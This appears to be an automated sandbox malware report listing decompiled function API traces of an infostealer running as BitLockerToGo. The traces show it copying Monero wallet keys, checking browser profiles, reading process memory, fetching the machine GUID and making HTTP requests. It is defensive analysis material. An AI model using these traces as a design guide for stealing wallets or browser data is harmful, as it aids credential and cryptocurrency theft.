                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                                                                                                                                                                                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4174444224-1526165396
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3ff3edd7601fd912c373f50e6083c706063e2e65b24345432ee859e7b7a0f79a
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: dc9d75ac100e945ec9df072d335ebd2d9c1c0705844172378caae321e062e1ab
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ff3edd7601fd912c373f50e6083c706063e2e65b24345432ee859e7b7a0f79a
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3321A175D80114ABEB11BF75ED85AAE77FAAF003607004565FE12A3154DF34DA05CBD1
                                                                                                                                                                                                                                                                                                                                                          Function 02A0FABD Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 324COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(8D5052FC), ref: 02A0FB02
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(8D5052FC), ref: 02A0FB79
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(8D5052FC,firefox), ref: 02A0FE8D
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(8D5052FC), ref: 02A0FC6F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(8D5052FC), ref: 02A0FD20
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(8D5052FC), ref: 02A0FD97
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID: Stable\$ Stable\$firefox
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3722407311-2697854757
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9c5516c8fa929e70ba39aad39567e4bdb14edfbc1e88b80d23f0f0ab96905dfd
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: dfd348246b7b1c9aa44f8320b74ecbdccfe005eaeffb9ecb56c36fe26513f54a
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c5516c8fa929e70ba39aad39567e4bdb14edfbc1e88b80d23f0f0ab96905dfd
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71C12F72D40519AFCB20FBB4FE86B9DB7B6AF44320F554110ED44A7240DF309A698ED2
                                                                                                                                                                                                                                                                                                                                                          Function 02A01AA8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 129stringfileCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A01ACC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A01A41: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 02A01A55
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A01A41: RtlAllocateHeap.NTDLL(00000000), ref: 02A01A5C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A01A41: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,02A01AD9), ref: 02A01A79
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A01A41: RegQueryValueExA.ADVAPI32(02A01AD9,wallet_path,00000000,00000000,00000000,000000FF), ref: 02A01A94
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A01A41: RegCloseKey.ADVAPI32(02A01AD9), ref: 02A01A9D
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 02A01AE1
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A01AEE
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,.keys), ref: 02A01B09
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A138A6: GetSystemTime.KERNEL32(?,02A37807,?), ref: 02A138D5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 02A01C1A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A09163
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0F752,?,?,?), ref: 02A0917A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0F752,?,?,?), ref: 02A09191
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A091A8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CloseHandle.KERNEL32(?,?,?,?,?,02A0F752,?,?,?), ref: 02A091D0
                                                                                                                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 02A01C8D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: CreateThread.KERNEL32(00000000,00000000,02A18B15,?,00000000,00000000), ref: 02A18C85
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A18C8D
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Filelstrcpy$lstrcat$CloseCreateHeaplstrlen$AllocAllocateCopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                                                                                                                                                                                                                                                                          • String ID: .keys$\Monero\wallet.keys
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2164590784-3586502688
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5fc06252709827f08e43cf7568e3462353cea6f1a33bed0a645187e8ab45ad6d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 49eeb95c385a93a8410dc77a297ec755253d7526145e0ee80e70a212332852f6
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fc06252709827f08e43cf7568e3462353cea6f1a33bed0a645187e8ab45ad6d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C51FA71D8022D9BCB21EB64EE85BDDB7BAAF04314F4044A1AA0873150DE71AF998F95
                                                                                                                                                                                                                                                                                                                                                          Function 02A06719 Relevance: 13.6, APIs: 9, Instructions: 110networkfileCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A10
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A16
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A1C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04A2E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04A36
                                                                                                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A06762
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 02A06782
                                                                                                                                                                                                                                                                                                                                                          • InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 02A067A3
                                                                                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02A067BE
                                                                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02A067F4
                                                                                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 02A06824
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 02A0684F
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 02A06856
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 02A06862
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2507841554-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d52d4772636f965a3ec8b4ed51c7121c7322a2061e7c9f4b9bd4573dec9908ad
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4f1df808dfd91d1c4eff4d936016e3dca447d56fb5f70f18a78f5b1412adaf2b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d52d4772636f965a3ec8b4ed51c7121c7322a2061e7c9f4b9bd4573dec9908ad
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C4162B5D40128ABDF209F20ED85BDA7BB9FF04714F1045A5BB09A3191DB309E95CFA8
                                                                                                                                                                                                                                                                                                                                                          Function 02A1187B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 153COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 02A118A0
                                                                                                                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 02A118CC
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A11911
                                                                                                                                                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,00000000,?,00000208,00000000), ref: 02A11976
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A11A02
                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 02A11A63
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1045E: _memmove.LIBCMT ref: 02A10478
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Process_memset$MemoryOpenRead_memmove
                                                                                                                                                                                                                                                                                                                                                          • String ID: N0ZWFt
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1717157771-431618156
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f875b28903c9d871b38281bcb55a9975c718a2440bf22d87782f79acdd192248
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a2db190abac0fc8fb8b1f26afd8a756a3f2cd83ea39e85113bb9981dcbe58422
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f875b28903c9d871b38281bcb55a9975c718a2440bf22d87782f79acdd192248
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65517DF1E402289BDF249B548D84BEDB7BAAB45314F0004EAE71DA7142DE716EC88F55
                                                                                                                                                                                                                                                                                                                                                          Function 02A13230 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48registryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A13263
                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 02A13282
                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 02A132A7
                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?), ref: 02A132B3
                                                                                                                                                                                                                                                                                                                                                          • CharToOemA.USER32(?,?), ref: 02A132C7
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                                                                                                                                                                                                                                          • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2235053359-1211650757
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1da354ccdba0c71b74f2559bcd8d43d5efebc03628d71bfca164ffb416eaeec6
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d4e6ba49c6c44f720d9391e4f9205c5bff1da73ec073b49ca43c1bd620f50c4f
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1da354ccdba0c71b74f2559bcd8d43d5efebc03628d71bfca164ffb416eaeec6
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF1152B594021DAFEB10DF50DD89FEBB7FCEB04304F4001A5B659E2052DA709E998F50
                                                                                                                                                                                                                                                                                                                                                          Function 02A01A41 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 35registrymemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 02A01A55
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A01A5C
                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,02A01AD9), ref: 02A01A79
                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(02A01AD9,wallet_path,00000000,00000000,00000000,000000FF), ref: 02A01A94
                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(02A01AD9), ref: 02A01A9D
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • wallet_path, xrefs: 02A01A8C
                                                                                                                                                                                                                                                                                                                                                          • SOFTWARE\monero-project\monero-core, xrefs: 02A01A6F
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
